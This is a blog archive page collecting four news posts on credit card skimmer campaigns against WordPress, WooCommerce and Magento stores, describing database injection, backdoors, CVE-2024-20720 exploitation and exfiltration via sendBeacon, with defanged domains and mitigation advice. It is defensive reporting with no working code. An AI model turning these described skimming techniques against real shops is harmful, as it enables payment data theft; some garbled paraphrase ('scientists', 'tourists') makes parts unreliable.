Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Magento. Show all posts
WordPress
CMS Cyber incidents Cyber Security Cyberattacks CyberCrime CyberThreat database Magento WordPress

Sophisticated Credit Card Skimmer Malware Targets WordPress Checkout Pages

 


Recent cybersecurity reports have highlighted a new, highly sophisticated credit card skimmer malware targeting WordPress checkout pages. This stealthy malware embeds malicious JavaScript into database records, leveraging database injection techniques to effectively steal sensitive payment information. Its advanced design poses significant risks to e-commerce platforms and their users. 
  
Widespread Impact on E-Commerce Platforms 
 
Multiple content management systems (CMS), including WordPress, Magento, and OpenCart, have been targeted by the Caesar Cipher Skimmer. This web skimmer enables the theft of payment data, threatening the financial security of businesses and consumers alike. 

Web skimmers are malicious scripts injected into e-commerce websites to collect financial and payment transaction details. According to cybersecurity firm Sucuri, a recent attack involved modifying the "form-checkout.php" file in the WooCommerce plugin to steal credit card information.
  • Consequences: Financial losses, reputational damage, and legal expenses.
  • Detection Difficulty: Often remains unnoticed until after the damage has occurred.

Signs of a compromised WooCommerce site include customer reports of stolen credit card details. This typically suggests malware capable of skimming customer credentials, warranting immediate investigation and remediation. 

On May 11, 2024, Sucuri identified a campaign misusing the "Dessky Snippets" WordPress plugin, which allows users to add custom PHP code. With over 200 active installations, the plugin was exploited by threat actors to inject malicious PHP code for credit card theft.
  • Attack Vectors: Exploiting plugin vulnerabilities and weak admin credentials.
  • Further Exploitation: Installing additional plugins to escalate malicious activities.
Database-Level Malware Infiltration 

Using the Dessky Snippets plugin, attackers deployed server-side PHP malware that embedded obfuscated JavaScript in the WordPress database.
  • Location: Stored in the wp_options table under widget_block.
  • Activation Trigger: Executes on pages containing "checkout" in the URL, avoiding pages with "cart."
Stealth and Strategic Execution The malware activates only during the final transaction stage, intercepting sensitive financial data without disrupting the user experience.
  • Integration: Utilizes existing payment fields to avoid detection.
  • Stealth Tactics: Remains hidden from standard file-scanning tools.

To conceal its activities, the malware encrypts stolen data using Base64 encoding and AES-CBC encryption. The encrypted data is discreetly sent to attacker-controlled servers via the navigator.sendBeacon function, ensuring stealthy exfiltration without alerting users or administrators. Severe Security Implications This malware poses a critical threat by covertly harvesting sensitive payment information, including credit card numbers and CVV codes.
  • Potential Risks: Fraudulent transactions, identity theft, and illegal data sales.
  • Impact on Businesses: Financial losses, legal liabilities, reputational damage, and erosion of customer trust.
Mitigation and Security Best Practices 
 
To counter such threats, e-commerce platforms must implement robust cybersecurity measures:
  • Regular monitoring of website activity for unusual behavior.
  • Timely updates of all plugins and platform software.
  • Proactive vulnerability management and penetration testing.
  • Strong admin credentials and limited plugin installations.
Staying vigilant and proactive in cybersecurity practices is essential to safeguarding sensitive customer data and maintaining the integrity of e-commerce operations.
Read more »
online transactions
Adobe Breach Cyber Security E Commerce Magento online transactions

E-commerce Breach: Hackers Target Magento, Steal Payment Data

 




In a concerning development for e-commerce security, hackers have been discovered exploiting a critical flaw in the popular Magento platform, leaving numerous online stores vulnerable to data breaches. The vulnerability, identified as CVE-2024-20720 with a severity score of 9.1, was acknowledged and addressed by Adobe in security updates released on February 13, 2024.

The exploit involves injecting a persistent backdoor into e-commerce websites, allowing threat actors to execute arbitrary commands and potentially steal sensitive payment data. Security experts from Sansec revealed that attackers are utilising a cleverly crafted layout template stored in the database to automatically insert malicious code into the system.

By combining the Magento layout parser with the beberlei/assert package, hackers can execute system commands, particularly targeting the checkout cart section of affected websites. This malicious code, facilitated by the 'sed' command, enables the installation of a payment skimmer, designed to capture and transmit financial information to compromised Magento stores under the attackers' control.

This incident underlines the urgency for e-commerce businesses to promptly apply security patches provided by Magento to mitigate the risk of exploitation. Failure to do so could leave them susceptible to financial losses and reputational damage.

The exploitation of vulnerabilities within the Magento platform has become an ongoing concern within the realm of e-commerce security. Since its acquisition by Adobe in 2018 for a significant $1.68 billion, Magento has grown to power more than 150,000 online stores worldwide. However, this widespread adoption has inadvertently made it an enticing target for cybercriminals seeking to exploit weaknesses in its infrastructure. One notable example of such exploitation is the MageCart attacks, which have highlighted the persistent threat posed by outdated and unsupported versions of Magento.

Given the prevalence of these vulnerabilities, it is pivotal for online merchants to prioritise cybersecurity measures to safeguard their customers' sensitive data and uphold trust within the e-commerce ecosystem. This necessitates a proactive approach that includes regular software updates, the implementation of robust security protocols, and continuous monitoring for any suspicious activities.

Industry stakeholders are urged to collaborate closely to enhance cybersecurity resilience and protect the integrity of online transactions. By staying informed and proactive, businesses can effectively combat cyber threats and uphold the security of their e-commerce operations.



Read more »
Threat actors
Magecart Magento malware Online Retailers PHP Code Injection Threat actors

Several Magento Sites were Targeted by a Surge of MageCart Attacks

 

A large number of online stores using the Magento 1 e-commerce system were targeted by a web skimmer, according to Sansec, an eCommerce security consultancy. 

The crawler detected roughly 374 infections in a single day, indicating an onslaught. The infection was downloaded from the domain naturalfreshmall[.]com, which is presently offline. The threat operators' purpose was to steal credit card information from consumers at the targeted online retailers.

An attacker often uses a security flaw in the Quickview plugin to insert rogue admin users into susceptible Magento stores as the initial intrusion vector. Under this scenario, however, the flaw was exploited to add a default value resulting in the database being updated with a file carrying a simple backdoor. By just surfing the Magento login page, the validation requirements for prospective consumers would be used to initiate the code execution. 

By implementing a default value to the customer_ eav_attribute table, misuse is possible. The host app is tricked into creating a malicious entity, which is then utilized to generate a basic backdoor (api 1.php). As per Sansec, the intruders installed 19 backdoors on the hacked system, which means the affected sites must remove all of them to avoid being targeted in future attacks.

Although thousands of merchants continue to use it, the Magento 1 platform has hit End-of-Life, and Adobe no longer provides security upgrades for the same. As a result, the sites are accessible to a wide range of cyberattacks, putting the clients' sensitive information at risk. These details usually include credit card numbers, mailing addresses, names, phone numbers, and email addresses, as well as anything else required to complete an online order.

All Magento administrators should make sure it is running the most current edition of the platform and upgrade if it is on an older, unsupported version.
Read more »
skimmers
Card Skimming Costway Credit Card Cyber Crime Magento skimmers

Outdated Magneto 1 Witnessed Credit Card Skimming Threats

 

Magento is an open-source code e-commerce site that supplies online traders with a scalable shopping cart system, and managing their online store's layout, content, and features. Lately, threat actors began leveraging a flaw in the ‘Magento 1’ branch that has not been managed any longer in the fall of 2020. 

Thousands of retailers worldwide on the platform are encouraged to upgrade the mobile version to ‘Magento 2’, as thousands of e-commerce shops were hacked with the credit card skimming code infecting all of them. During the tracking of events related to the ‘Magento 1’ initiative, observably, an e-commerce shop was attacked twice by skimmers. 

In this particular incident, the threat actors devised a copy of their writings that is well-known to places that were already injected by the Magento 1 skimmer. The second skimmer will now actually collect the credit card data from the pre-existing fake form which were previously injected by the actors.

"A large number of Magento 1 sites have been hacked but yet are not necessarily being monetized,” as stated by the researcher at Malwarebytes. He further added that “Other threat actors that want access will undoubtedly attempt to inject their own malicious code. When that happens, we see criminals trying to access the same resources and sometimes fighting with one another.” 

The end-of-life of Magento 1, paired with a famous feat, was an immense blessing for the actors at risk. Many pages were indiscriminately compromised merely because they were weak. RiskIQ has allocated these cases to Magecart Group 12, which uses diverse tactics including chain threats with a long history of web skimming.

On the payment websites of Costway, one of the leading retailers in North America and Europe, two web skimmers have been found selling appliances, furniture, etc. The skimmers seek to provide payment information with consumers' credit card. “Our crawlers identified that the websites for Costway France, U.K., Germany, and Spain, which run the Magento 1 software, had been compromised around the same time frame,” said researchers. 

On the Costway check-out page, the researchers noticed the credit card skimmer injection, which stands out in English while the majority of the platform is in French. This is no surprise considering the automated and very indiscriminate Magento 1 hacking campaign. 

The threat to victims is huge, as scientists claim that just in December 2020, Costway's French portal (Costway[.]fr) received approximately 180K tourists. There is also a second skimmer (loaded from the securityxx[.]top externally) on the web which targets the skimmer of Magento 1. 

Many Magento 1 websites have been compromised, but they are not monetized yet. Additional attacks would certainly continue to inject their own malicious code.
Read more »
Subscribe to: Posts (Atom)